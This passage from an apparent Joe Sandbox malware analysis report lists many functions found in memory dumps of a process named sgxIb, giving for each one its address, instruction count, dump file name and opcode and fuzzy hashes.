                                              • Instruction ID: a6cae6def8229d085afba0890c55a24db311e864793426c40f0a2e02e5dfc4df
                                              • Opcode Fuzzy Hash: 9f5c6c3ff5d8082d435705352ff6b96f9a144e5debfc356f2f33eec78f7f3c86
                                              • Instruction Fuzzy Hash: 0C01B139B041504FCB66977DA8547AE7BE6DBC6624B10847AE00BCB354EA15DD034392
                                              Function 06DB4318 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1082a3e5acf4bd6f9e483a41c31eadbde1612e0db4f68d2f4dfaa8772b6083d6
                                              • Instruction ID: 9d5849b27ac2c94e392e58aebd662a6c7ab5db38ee1a0d4df7b5f665451a16f9
                                              • Opcode Fuzzy Hash: 1082a3e5acf4bd6f9e483a41c31eadbde1612e0db4f68d2f4dfaa8772b6083d6
                                              • Instruction Fuzzy Hash: 3B01F135B100100BDB68D66DD811B6FA7DADBC6224F288539E04FC339ADA25DC028391
                                              Function 06DB3570 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67c7ce5c69b99f229858f80acf96a1df93456fbccbd8e0c6d948e9e061ef04f3
                                              • Instruction ID: 86e5a29a425606a6f5f57bc29e86ecae2996339a23e6664d78dd463805158e24
                                              • Opcode Fuzzy Hash: 67c7ce5c69b99f229858f80acf96a1df93456fbccbd8e0c6d948e9e061ef04f3
                                              • Instruction Fuzzy Hash: D911C2B1E00224CFCB54DBB8D8411DEF7F5EB88310F15956AD446E7304EA30DA41DBA1
                                              Function 06DB316C Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d95a0fce006a5c1c329bec52fcf4c5e5d0f4d622bc0775b77bcac52650175487
                                              • Instruction ID: 83d9474e8cc65b888362ec16a310f7c282f9f7362b44c3c84719173284e82248
                                              • Opcode Fuzzy Hash: d95a0fce006a5c1c329bec52fcf4c5e5d0f4d622bc0775b77bcac52650175487
                                              • Instruction Fuzzy Hash: 6021C0B1D01259AFCB40DF9AD884ADEFBB8FB49310F50812AE918B7201C374A954CBE5
                                              Function 074916F1 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 140f25836be53384f622ec9f839e5ba3d3a5f82a2a8db818e7bb694fdfebfb7d
                                              • Instruction ID: 284b897c0b2f2c02b5148f26dcfd4fbed8dc725eff0de7ee273e004987d48cfb
                                              • Opcode Fuzzy Hash: 140f25836be53384f622ec9f839e5ba3d3a5f82a2a8db818e7bb694fdfebfb7d
                                              • Instruction Fuzzy Hash: 7411E0B46143079FC7649B2895885A3BFA6BB96640B0888AFD04287681D736EC42CB91
                                              Function 06DB3D99 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 275fb9b9698828210728b244f0323af4c85ceacec6b5fd3eebbfc96d99daac5c
                                              • Instruction ID: 7682c11fa966eea49c1689570a7317f00424df4dd67e7564b36bc2b29475d5a2
                                              • Opcode Fuzzy Hash: 275fb9b9698828210728b244f0323af4c85ceacec6b5fd3eebbfc96d99daac5c
                                              • Instruction Fuzzy Hash: 7821C2B5D01219AFCB00DF9AD885ADEFBB8FB49310F10812AE918B7300C374A954CBE5
                                              Function 0135D1F3 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4490962178.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_135d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                              • Instruction ID: 4ff25465de78b893c903169f038edc189c3b660e61ea0b9ef0f2f41c133ef6a9
                                              • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                              • Instruction Fuzzy Hash: FE119D76504280DFDB12CF54D5C4B15BF71FB84728F24C6AADC494B656C33AD44ACBA2
                                              Function 0135D3A3 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4490962178.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_135d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: 7e2d213832322dca597b102073d4413ddf99194e919d88458ae50adbbe39d0c1
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: 5311BBB5504280CFDB02CF54D5C4B15BFA2FB84718F24C6AADD494B266C33AE44ACB62
                                              Function 06DB4328 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ddab542f7ae07d4a9fc9c7d568e3aab8f25cbe714c8240cfba2890ab936e55df
                                              • Instruction ID: 1c9f48c51c0be97707269e704237c734496509ee502174767461b8aee49ca8a8
                                              • Opcode Fuzzy Hash: ddab542f7ae07d4a9fc9c7d568e3aab8f25cbe714c8240cfba2890ab936e55df
                                              • Instruction Fuzzy Hash: 0B01AD31B100204BDB68D66D9414B6FA7DADBCA724F14883AE10FC7359DD65DC024391
                                              Function 06DBF2C8 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1188b7f70882272cf0c26b9772f4d2460a214cada41f457e4e57c28b416b1d27
                                              • Instruction ID: 1a629a62fd74d61cc6c0dfe925f3e6bd0139d690065836238e5c99a46d484bd2
                                              • Opcode Fuzzy Hash: 1188b7f70882272cf0c26b9772f4d2460a214cada41f457e4e57c28b416b1d27
                                              • Instruction Fuzzy Hash: 77018C35B000148BDB659B7DE854B6EA2DADBCA628F108839E50FC7358EE65DD034392
                                              Function 06DB40D0 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0eb1f3d1f0b0fd89488b5e926d26eba43a2b1f5e107119ec42cc26cff5e927e5
                                              • Instruction ID: 7d2f132c981171ff869381b0df947927d9337f25dba479a4c7d78fc235bb4cd6
                                              • Opcode Fuzzy Hash: 0eb1f3d1f0b0fd89488b5e926d26eba43a2b1f5e107119ec42cc26cff5e927e5
                                              • Instruction Fuzzy Hash: 53018F36F140158BDB95DAA8D8142EF72F6ABC8258F06443AD44AE3258EE69CC1647C2
                                              Function 06DBA422 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d807504506ed592b68303c9f3501cd20bea4ca3eb7742a71cb653516be5f8fa8
                                              • Instruction ID: d88fe388c71d2095902c750255614b5337755ab978146068878a07dd235503c2
                                              • Opcode Fuzzy Hash: d807504506ed592b68303c9f3501cd20bea4ca3eb7742a71cb653516be5f8fa8
                                              • Instruction Fuzzy Hash: 6A01FD32B100108FDBA4CA6CE9987AB77D2EB89319F148439E00FD7758DE29DC028780
                                              Function 07490C04 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e735631471320a0284897ccffeedc00754cb01b95390e19fd70e3f98101eaeb
                                              • Instruction ID: 7863650da6f13ffdbf36b680cef89bec7dd45e2aff679463ece797aa74aa95a3
                                              • Opcode Fuzzy Hash: 1e735631471320a0284897ccffeedc00754cb01b95390e19fd70e3f98101eaeb
                                              • Instruction Fuzzy Hash: CB0192F8220707DBC7249B2995845637FE5FB85750F448DAEE41686640CB76EC028B41
                                              Function 06DBA430 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1ce148a6c74b54acd7e8c1f79b17a2b317b42284accd67100e6ef1d5ca5a3bc
                                              • Instruction ID: a71699b1bc94411f1301ae2e013c73eea2a599427e049a6b0ede717e8148a878
                                              • Opcode Fuzzy Hash: b1ce148a6c74b54acd7e8c1f79b17a2b317b42284accd67100e6ef1d5ca5a3bc
                                              • Instruction Fuzzy Hash: D601D131B100108FDB64DA7CE454B5A73D6EBCA719F108439E10FD7354DE29DC028780
                                              Function 06DBC908 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d79e4ea68501a3f888c81b0ceec1f4ef5a4528a946c3be3d861abb084487e454
                                              • Instruction ID: 6fdcc91fa9b0a937a5ee4371ed09edff95b3e2858cfd3c6e958adc3d0b1f008a
                                              • Opcode Fuzzy Hash: d79e4ea68501a3f888c81b0ceec1f4ef5a4528a946c3be3d861abb084487e454
                                              • Instruction Fuzzy Hash: EF01F471B201289BDF289F79E840A9EB77AFB85354F004539E902EB344DB36AC05CBC0
                                              Function 07490934 Relevance: .0, Instructions: 40COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81163c829f4c000df6c8bdb3b8220e689d72e4a28ef71176ea57ad415376a6ce
                                              • Instruction ID: 401ac5b66f4893e060be8636a65b3e0bcea2c2454d3e19aaab0206d4976d8e01
                                              • Opcode Fuzzy Hash: 81163c829f4c000df6c8bdb3b8220e689d72e4a28ef71176ea57ad415376a6ce
                                              • Instruction Fuzzy Hash: 33F028B110A3929FCF329B7898006E17FE8EE0720070805AFD084C7B62C7149805C792
                                              Function 07491988 Relevance: .0, Instructions: 35COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9d2197f83e74467f18751033bae4bade79b6e9f1d8420b2e98e431ef44ba6f0
                                              • Instruction ID: 68fb7a799a014a6f6e530e4131fb57e5abf6c6349db5e56615fdaff9321e6d84
                                              • Opcode Fuzzy Hash: c9d2197f83e74467f18751033bae4bade79b6e9f1d8420b2e98e431ef44ba6f0
                                              • Instruction Fuzzy Hash: 7701373210528BEFCB02CF28D988C85BFB2EF4630032984E7E0448B526D336E925DB11
                                              Function 0749193A Relevance: .0, Instructions: 34COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4fbc750ffb9c3ac402438c06884c23e514f2d261fffd853e3166f677a11e8c18
                                              • Instruction ID: 51bca16f9046015ff2f7b6ed90aabb02d183232dfd8f56553495b259c13c4e71
                                              • Opcode Fuzzy Hash: 4fbc750ffb9c3ac402438c06884c23e514f2d261fffd853e3166f677a11e8c18
                                              • Instruction Fuzzy Hash: 29F06D70D04346AFCB21CFB9D80449AFFF5EF4A20070485ABE495D3201D731A928CB91
                                              Function 07491948 Relevance: .0, Instructions: 27COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d78a1af5a778504aaadac72ea18678366abb3981076afa830cb487d50b42934
                                              • Instruction ID: 6ffe3efb9499bf1f4461a9c3c1cbc088abadedac5f8d02eda886525954feacf8
                                              • Opcode Fuzzy Hash: 0d78a1af5a778504aaadac72ea18678366abb3981076afa830cb487d50b42934
                                              • Instruction Fuzzy Hash: 34F030B5E00718AF8F34DFA9D80449AFBF9EF49610B00856AE456D3600D731E914CF90
                                              Function 07490848 Relevance: .0, Instructions: 27COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b93c670a321b8d607115172dceead8824e9acab48b605c759d27685f223315e
                                              • Instruction ID: e2176ba83b7e516ce934760f59cd80e02c12c4ab8332f4d8f388b6341ee4fd32
                                              • Opcode Fuzzy Hash: 9b93c670a321b8d607115172dceead8824e9acab48b605c759d27685f223315e
                                              • Instruction Fuzzy Hash: C6E04F727101119B8754EA5FA48496ABB9FFFC95643A580BEE10DC7321DE62EC024690
                                              Function 07490E52 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6205394b8e2021e7c4bdfd18f5552091863044e245a05ec1bf8dc7130a5a0d35
                                              • Instruction ID: d1198e740bd0ef0c4f03a8356750f76842a9b4cc652e34055f1def9b8d999038
                                              • Opcode Fuzzy Hash: 6205394b8e2021e7c4bdfd18f5552091863044e245a05ec1bf8dc7130a5a0d35
                                              • Instruction Fuzzy Hash: E5F01CB824A2428FE301DF70EA5AA513FB2EB86300F104176DA118B395EA7E4C05CF12
                                              Function 074908F8 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 600eef07756c42ab5b5749dbe279aa5587b074545b4a1225daeb05747d2ab407
                                              • Instruction ID: 354fb8316ad1420f40ae96a938e2fffbcc6b37d16f571dd765bc5fad7fb4d4bf
                                              • Opcode Fuzzy Hash: 600eef07756c42ab5b5749dbe279aa5587b074545b4a1225daeb05747d2ab407
                                              • Instruction Fuzzy Hash: 3BE0DF756067628FCB329F38A4016DA7FF8AB07610304096FE895C3B52C724EC04CBA2
                                              Function 06DB6588 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d758217144de6c4620f6d7cfbf3a82959bbe8d27d77a003df2dc867954d5f576
                                              • Instruction ID: bf263de08ef20ffdbe627dcd9943d646b8ebbb60914aa9816533e28d7ce28264
                                              • Opcode Fuzzy Hash: d758217144de6c4620f6d7cfbf3a82959bbe8d27d77a003df2dc867954d5f576
                                              • Instruction Fuzzy Hash: 3EE0D8B1D15188DFDF60CB70CA057EA3BA5DB02204F2588E6C849DB24EE135CE128785
                                              Function 07490D38 Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d48690a29c381405c3422cd6fa6cd07922790a9f8f87679ad57b66b5dc9592a
                                              • Instruction ID: 154bbc399eac417193ea83d6b8ac859c30a2bcfe59af94b589f077e0b67ce937
                                              • Opcode Fuzzy Hash: 7d48690a29c381405c3422cd6fa6cd07922790a9f8f87679ad57b66b5dc9592a
                                              • Instruction Fuzzy Hash: 92E046B1208742DFC332CF38E4888A37FF4BF1A2203054A8BE481C7A16C720E844CBA1
                                              Function 06DB6598 Relevance: .0, Instructions: 22COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1fa225661ddbad690980ca199bd9c8a91c65082e2f7e24f673e5af566a448d84
                                              • Instruction ID: 70731d577c74114c942558eea89efe43d50da3c88218663e8e40869d84a1c09d
                                              • Opcode Fuzzy Hash: 1fa225661ddbad690980ca199bd9c8a91c65082e2f7e24f673e5af566a448d84
                                              • Instruction Fuzzy Hash: A0E0C2B1E10248EBDF60CFB0C9057AE73ECD702208F2084A4D40ACB30AE272DA118780
                                              Function 07490E60 Relevance: .0, Instructions: 19COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad2633923639b1b0e4bea280515ce1ec3e3f0dbfb93e7a419bf6957d05cec701
                                              • Instruction ID: c1e88f9f9a028bbf21e30c06777580f5aec1e869ebeb9c5b959acae1db572718
                                              • Opcode Fuzzy Hash: ad2633923639b1b0e4bea280515ce1ec3e3f0dbfb93e7a419bf6957d05cec701
                                              • Instruction Fuzzy Hash: 73E09AB86462059FE7049F60FA4AF623BA7E385701F1081369E154B7C0EA7E5902CF12
                                              Function 07490908 Relevance: .0, Instructions: 18COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7a01b5a16b8cd1da9349cbb8d1a2f1ea773c4335194607852a57762b4a9a1db
                                              • Instruction ID: 9b00c1e4ed8f75a15e228ccaebf824684748f0c5305ef77d0d37a255ab295857
                                              • Opcode Fuzzy Hash: e7a01b5a16b8cd1da9349cbb8d1a2f1ea773c4335194607852a57762b4a9a1db
                                              • Instruction Fuzzy Hash: 85D012706017228B8E34DE29A00059AB7FCAB46610300092FE456C3750D761E9048785
                                              Function 074916C0 Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 69e137b82c7187caf211a5928eb0c753be98897284e086fd7751c75e81aaa3ff
                                              • Instruction ID: 129a3a0bea3172a9b06bc429b67c7a0d92a13b47588f1ccad3dec573a7f327b6
                                              • Opcode Fuzzy Hash: 69e137b82c7187caf211a5928eb0c753be98897284e086fd7751c75e81aaa3ff
                                              • Instruction Fuzzy Hash: 2CD02272208126A7DB09B2F9E0107EE3B9A8F85210F000477D20CC728ACE8DCC4243E7
                                              Function 07491C70 Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0471456ba3f1421663e4b28ed88d0266a2bb94d23c7778e9bf1d4fe7c8c0503a
                                              • Instruction ID: 56b4f90ecbced108458949e487340cdaa277c2f071cf170eef73110f2383420b
                                              • Opcode Fuzzy Hash: 0471456ba3f1421663e4b28ed88d0266a2bb94d23c7778e9bf1d4fe7c8c0503a
                                              • Instruction Fuzzy Hash: 98D0123314410D9E5F80EA95E840C927BDDAB546007408473E504C6220E721E564E751
                                              Function 07491B12 Relevance: .0, Instructions: 13COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8130c6055c375fb3687a75e6aa6a9cbbb8e049f0db4f31331f89e7bd260ca1d
                                              • Instruction ID: 495e49077759a481a2d183e3f7d70039e6fa40a43dc55536167fd78d22fdfcdb
                                              • Opcode Fuzzy Hash: e8130c6055c375fb3687a75e6aa6a9cbbb8e049f0db4f31331f89e7bd260ca1d
                                              • Instruction Fuzzy Hash: 6DC08C3333042642EA08629CE2207FE7B8B4B88220F64002BD01CD3684CE94CD9302CA
                                              Function 07491B18 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7874d6b9c41f95d9d4f1170b0ad2f4870eec92a827f07a6bf1dc7ed97d9503a4
                                              • Instruction ID: dacbeb9bc56dafa653c28b17ec85ca8675b706e06d99e454461c81dde7cb8849
                                              • Opcode Fuzzy Hash: 7874d6b9c41f95d9d4f1170b0ad2f4870eec92a827f07a6bf1dc7ed97d9503a4
                                              • Instruction Fuzzy Hash: 08B09B2232423913DA1C319D64206FE768E47C5564F50007B951D877415DC59C4202DB
                                              Function 074916D0 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f518ab3c50e1fba40e3b9f94d97ced496102f196fc9e19d8d87bcb391ea9246
                                              • Instruction ID: 8c1fb1b6ef8fae388e490a52fb25fd64745d5d39c7b7736a912a57652f48aa77
                                              • Opcode Fuzzy Hash: 1f518ab3c50e1fba40e3b9f94d97ced496102f196fc9e19d8d87bcb391ea9246
                                              • Instruction Fuzzy Hash: 48B09B6131413513DE0C719D64106FE768E4BC5564F00007BD51D877419DD59C4142DB
                                              Function 07490253 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b6d240e0d3f034cb142f2d9c912a1a43cc73d48384aa960d61b79e86f34d872
                                              • Instruction ID: 052bf9d781b1c69a85f7172291e211ffdb9426f3b6217af1636c21ca6009cc7b
                                              • Opcode Fuzzy Hash: 8b6d240e0d3f034cb142f2d9c912a1a43cc73d48384aa960d61b79e86f34d872
                                              • Instruction Fuzzy Hash: 16D0C9B084421BCFEF758F80C8197EEBF70BB05315F10442AD401A61A4CBBD0946CF50
                                              Function 074908E0 Relevance: .0, Instructions: 9COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 02ca1b08d05391dd0723763f29aa1bbcc4413b0d7a8da007dfd57cf5687ec529
                                              • Instruction ID: 514972420231231c63ece3e2f8a11e1c2fe494130def0f4e8450e891be6aa4de
                                              • Opcode Fuzzy Hash: 02ca1b08d05391dd0723763f29aa1bbcc4413b0d7a8da007dfd57cf5687ec529
